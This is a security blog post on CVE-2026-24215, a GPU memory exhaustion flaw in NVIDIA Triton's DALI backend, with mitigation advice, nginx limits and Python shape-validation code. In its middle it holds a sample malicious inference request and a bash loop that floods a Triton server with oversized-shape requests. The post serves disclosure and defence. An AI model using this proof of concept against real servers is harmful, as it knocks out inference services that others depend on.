ekofyi
Security Research | 7 min read

CVE-2026-24215: NVIDIA Triton's DALI Backend Will Let Attackers Eat Your GPU Memory for Breakfast

A new resource consumption vulnerability (CVE-2026-24215) in NVIDIA Triton Inference Server's DALI backend allows attackers to exhaust GPU memory, leading to denial-of-service. This post details the vulnerability, its impact, and immediate mitigation strategies.

Your ML Inference Server Is One Request Away From a DoS

If you're running NVIDIA Triton Inference Server with the DALI backend — and if you're doing any kind of image or video preprocessing in your ML pipeline, there's a good chance you are — you need to pay attention to this one.

CVE-2026-24215 just dropped, and it's a resource consumption vulnerability that lets an attacker starve your inference server of resources until it falls over.

The CVSS score is 5.7 (Medium), which means it might not grab widespread attention. But here's the thing: denial-of-service against ML inference infrastructure is not a medium-severity problem in practice. If your revenue depends on model predictions being available — fraud detection, recommendation engines, real-time content moderation — this is a business-critical issue wearing a "medium" label.

I've seen too many teams dismiss medium-severity CVEs in their ML stack because "it's not RCE." That's the wrong framing. Let me walk you through why.

What Happened

NVIDIA published CVE-2026-24215, affecting the DALI (Data Loading Library) backend in Triton Inference Server. The vulnerability allows an attacker to trigger uncontrolled resource consumption — meaning they can craft requests that cause the server to allocate memory (likely GPU memory, given DALI's role) without proper bounds checking or cleanup.

DALI is NVIDIA's high-performance data loading and preprocessing library. In the context of Triton, it handles the heavy lifting of image decoding, resizing, augmentation, and other preprocessing steps before tensors hit your model. It's the front door of your inference pipeline.

The attack vector here is network-based. An attacker doesn't need local access or authentication (depending on your Triton deployment configuration). They send specially crafted inference requests to the DALI backend, and the server dutifully allocates resources to process them — without enforcing sane limits on what those requests can demand.

The result: memory exhaustion, GPU OOM errors, and eventually your inference server either crashes or becomes so degraded that legitimate requests time out. Classic resource exhaustion DoS.

Technical Deep-Dive: How the Attack Works

To understand this vulnerability, you need to understand how DALI pipelines work inside Triton.

When you configure a DALI backend model, you define a preprocessing pipeline that gets executed for every inference request:

python
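import nvidia.dali as dali
import nvidia.dali.fn as fn

@dali.pipeline_def(batch_size=256, num_threads=4, device_id=0)
def preprocessing_pipeline():
    # In the Triton DALI backend, request data enters the pipeline through
    # a named external_source; the name must match the model's input name.
    data = fn.external_source(device="cpu", name="INPUT_0")
    # Decode the encoded image bytes; "mixed" takes CPU input and decodes on the GPU.
    images = fn.decoders.image(data, device="mixed")
    resized = fn.resize(images, resize_x=224, resize_y=224)
    # ImageNet mean/std, scaled to the 0-255 pixel range.
    normalized = fn.crop_mirror_normalize(
        resized,
        mean=[0.485 * 255, 0.456 * 255, 0.406 * 255],
        std=[0.229 * 255, 0.224 * 255, 0.225 * 255],
    )
    return normalized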

The problem is in how DALI handles input data sizing. When an attacker sends a request with input tensors that declare extremely large dimensions or malformed shape metadata, DALI attempts to allocate buffers to accommodate them before validating whether the request is reasonable.

Here's what a malicious request might look like:

http
POST /v2/models/dali_preprocessing/infer HTTP/1.1
Host: triton-server:8000
Content-Type: application/json

{
  "inputs": [{
    "name": "INPUT_0",
    "shape": [1, 100000, 100000, 3],
    "datatype": "UINT8",
    "data": []
  }]
}

That shape field claims the input is a 100,000 x 100,000 pixel image. DALI's backend attempts to allocate memory for intermediate processing buffers based on this declared shape. Even if the actual payload is empty or tiny, the allocation happens based on the declared dimensions.

Send a few dozen of these concurrently, and you've exhausted the GPU memory pool. The server starts rejecting legitimate requests or crashes outright.
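To put numbers on that, here is the back-of-the-envelope arithmetic. It is an estimate, not a measurement: it assumes a dense buffer sized exactly to the declared shape (real intermediate buffers may be larger or smaller), it takes "a few dozen" to mean 24, and `declared_bytes` and `BYTES_PER_ELEMENT` are illustrative names, not part of Triton or DALI.

```python
from math import prod

# Bytes per element for a few Triton datatype strings (illustrative subset).
BYTES_PER_ELEMENT = {"UINT8": 1, "FP16": 2, "INT32": 4, "FP32": 4}

def declared_bytes(shape, datatype):
    """Size in bytes of a dense buffer matching the declared shape."""
    return prod(shape) * BYTES_PER_ELEMENT[datatype]

single = declared_bytes([1, 100_000, 100_000, 3], "UINT8")
concurrent = 24 * single  # assumed reading of "a few dozen" requests

print(f"one request: {single / 1e9:.1f} GB")      # one request: 30.0 GB
print(f"24 requests: {concurrent / 1e9:.1f} GB")  # 24 requests: 720.0 GB
```

Under these assumptions, a single declared shape asks for 30 GB, and a couple dozen of them exceed the memory of any one GPU many times over.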

The root cause is a classic case of trusting attacker-controlled metadata: the declared shape is used to size allocations before the actual data is validated against it, and nothing caps how large that allocation can be.

bash
# Simple PoC: send concurrent malformed requests to exhaust resources
for i in $(seq 1 50); do
  curl -s -X POST http://triton-server:8000/v2/models/dali_preprocessing/infer \
    -H "Content-Type: application/json" \
    -d '{"inputs":[{"name":"INPUT_0","shape":[1,50000,50000,3],"datatype":"UINT8","data":[]}]}' &
done
wait

The fix needs to happen at two levels: DALI needs to validate input shapes against configured maximums before allocating buffers, and Triton's request handling needs to enforce resource quotas per-request.
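The first half of that fix, validating before allocating, can be sketched in a few lines. This is a hypothetical illustration, not the actual patch and not DALI or Triton code: `MAX_ELEMENTS`, `ShapeError`, and `check_before_allocate` are names invented here, and it assumes the JSON request form shown earlier with `data` sent as a flat list of elements.

```python
from math import prod

MAX_ELEMENTS = 50_000_000  # assumed per-input ceiling; tune per model

class ShapeError(ValueError):
    """Raised when declared shape metadata cannot be trusted."""

def check_before_allocate(tensor: dict) -> int:
    """Return the element count to allocate for, or raise ShapeError.

    Two checks run before any buffer would be sized:
    1. the declared shape is well-formed and under the ceiling;
    2. the declared element count matches the payload actually sent.
    """
    shape = tensor.get("shape")
    if not isinstance(shape, list) or not shape:
        raise ShapeError("shape must be a non-empty list")
    for dim in shape:
        # bool is a subclass of int, so exclude it explicitly
        if isinstance(dim, bool) or not isinstance(dim, int) or dim < 0:
            raise ShapeError(f"invalid dimension: {dim!r}")
    declared = prod(shape)
    if declared > MAX_ELEMENTS:
        raise ShapeError(f"{declared} elements exceeds {MAX_ELEMENTS}")
    data = tensor.get("data")
    if not isinstance(data, list):
        raise ShapeError("data must be a list")
    if len(data) != declared:
        raise ShapeError(
            f"shape declares {declared} elements, payload has {len(data)}"
        )
    return declared
```

With this ordering, the malicious request above fails the ceiling check, and a request that stays under the ceiling but declares more elements than it carries fails the consistency check. In both cases nothing has been allocated yet.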

Impact Analysis

Who's affected? Anyone running Triton Inference Server with DALI backend models exposed to untrusted network traffic. This is more common than you'd think — many deployments put Triton behind an API gateway but don't enforce strict input validation at the gateway level because "the model server handles that."

The blast radius depends on your architecture. If you're running a shared Triton instance serving multiple models, a DoS against the DALI backend can take down every model sharing that GPU, not just the DALI-backed ones. GPU memory is a shared resource. One model's OOM is every model's OOM.

Real-world implications: if you're in production with Triton serving customer-facing predictions — think content moderation, visual search, autonomous vehicle perception pipelines, or medical imaging — this vulnerability means an unauthenticated attacker can take your inference offline.

The 5.7 CVSS score reflects the "availability" impact, but it doesn't capture the cascading business impact of your ML pipeline going dark.

What To Do About It Right Now

First, check if you're affected. If you're running Triton with any DALI backend models, assume you are until you've patched:

bash
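# Confirm the server is ready (prints the HTTP status), then read its version
curl -s -o /dev/null -w '%{http_code}\n' http://localhost:8000/v2/health/ready
curl -s http://localhost:8000/v2 | python3 -m json.tool

# List loaded models (the index endpoint expects POST). The grep only
# catches models with "dali" in their name; to be sure, check each model's
# config at /v2/models/<name>/config for "backend": "dali".
curl -s -X POST http://localhost:8000/v2/repository/index | python3 -m json.tool | grep -i dali

# Check which Triton image tag your running containers use
docker ps --format '{{.Image}}\t{{.Names}}' | grep tritonserver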

Immediate mitigation (before you can patch): enforce input size limits at your API gateway or load balancer. Don't let requests with absurd tensor shapes reach Triton.

nginx
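# nginx rate limiting + request size cap for Triton
# limit_req_zone belongs in the http {} context; 10r/s is an example rate
limit_req_zone $binary_remote_addr zone=triton_limit:10m rate=10r/s;

server {
    location /v2/models/ {
        client_max_body_size 10m;
        limit_req zone=triton_limit burst=20 nodelay;
        # assumes an upstream named "triton-backend" is defined elsewhere
        proxy_pass http://triton-backend;
    }
}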

But request body size alone won't save you — the attack uses small payloads with large declared shapes. You need application-level validation.

If you have a middleware layer, add shape validation:

python
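# Middleware: validate input shapes before forwarding to Triton
from math import prod

MAX_DIMENSION = 4096       # Reasonable max for your use case
MAX_ELEMENTS = 50_000_000  # 50M elements max

def validate_inference_request(request_body: dict) -> bool:
    """Return True if every input shape is acceptable; raise ValueError otherwise."""
    for input_tensor in request_body.get("inputs", []):
        shape = input_tensor.get("shape", [])
        if not isinstance(shape, list):
            raise ValueError("Input shape must be a list")
        for dim in shape:
            # Reject non-integers and negatives (e.g. "4096", 1.5, -1), which
            # would otherwise slip past the comparisons below
            if isinstance(dim, bool) or not isinstance(dim, int) or dim < 0:
                raise ValueError(f"Invalid input dimension: {dim!r}")
            if dim > MAX_DIMENSION:
                raise ValueError(
                    f"Input dimension {dim} exceeds maximum {MAX_DIMENSION}"
                )
        # Also validate total element count
        if prod(shape) > MAX_ELEMENTS:
            raise ValueError("Total tensor size exceeds limit")
    return True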

Patch: Update to the latest Triton Inference Server release that includes the fix. Monitor NVIDIA's security bulletin page for the specific patched version. If you're pulling from nvcr.io/nvidia/tritonserver, update your image tag and redeploy.

One more thing to watch out for: if you're running Triton in Kubernetes with autoscaling, a resource exhaustion attack might trigger aggressive pod scaling before the pods crash, potentially running up your cloud bill before the DoS actually manifests as downtime. Set resource limits on your Triton pods, and cap the autoscaler's maximum replica count so an attack can't scale you indefinitely.

The Bigger Picture

This CVE is a symptom of a broader problem: ML infrastructure is being deployed with the security posture of internal tooling but the exposure of production services.

Teams treat model servers like they're behind seven layers of VPN, but in reality they're often one misconfigured ingress rule away from the internet.

Input validation for ML inference is fundamentally different from traditional web app input validation. You're not just checking string lengths and SQL injection patterns — you're validating tensor shapes, data types, batch sizes, and sequence lengths. Most WAFs have zero understanding of these attack surfaces.
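As a rough illustration of what tensor-aware validation covers beyond a single size ceiling, the sketch below checks one input against a per-model specification. Everything in it is hypothetical: `InputSpec`, its fields, `violations`, and the limits in the example are invented for illustration and would need to mirror your own model's configuration. It assumes every input has at least one dimension, with the batch dimension first.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class InputSpec:
    name: str
    datatype: str   # Triton datatype string, e.g. "UINT8"
    rank: int       # expected number of dimensions, batch included (>= 1)
    max_batch: int  # ceiling on the leading (batch) dimension
    max_dim: int    # ceiling on every other dimension

def violations(tensor: dict, spec: InputSpec) -> list[str]:
    """Return human-readable problems; an empty list means acceptable."""
    problems = []
    if tensor.get("name") != spec.name:
        problems.append(f"unexpected input name {tensor.get('name')!r}")
    if tensor.get("datatype") != spec.datatype:
        problems.append(f"datatype must be {spec.datatype}")
    shape = tensor.get("shape")
    # type(d) is int also rules out bools, floats, and numeric strings
    if not isinstance(shape, list) or not all(type(d) is int and d >= 0 for d in shape):
        problems.append("shape must be a list of non-negative integers")
        return problems
    if len(shape) != spec.rank:
        problems.append(f"expected rank {spec.rank}, got {len(shape)}")
        return problems
    if shape[0] > spec.max_batch:
        problems.append(f"batch size {shape[0]} exceeds {spec.max_batch}")
    problems.extend(
        f"dimension {d} exceeds {spec.max_dim}" for d in shape[1:] if d > spec.max_dim
    )
    return problems

# Example limits for an image model; the numbers are placeholders.
spec = InputSpec("INPUT_0", "UINT8", rank=4, max_batch=256, max_dim=4096)
bad = {"name": "INPUT_0", "datatype": "UINT8", "shape": [1, 100000, 100000, 3]}
for problem in violations(bad, spec):
    print(problem)
```

Returning a list of problems instead of raising on the first one makes it easier to log exactly why a request was rejected, which helps when tuning the limits.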

If you're running inference infrastructure, you need to build this validation layer yourself, and you need to treat it as a first-class security control, not an afterthought.

Written by Eko
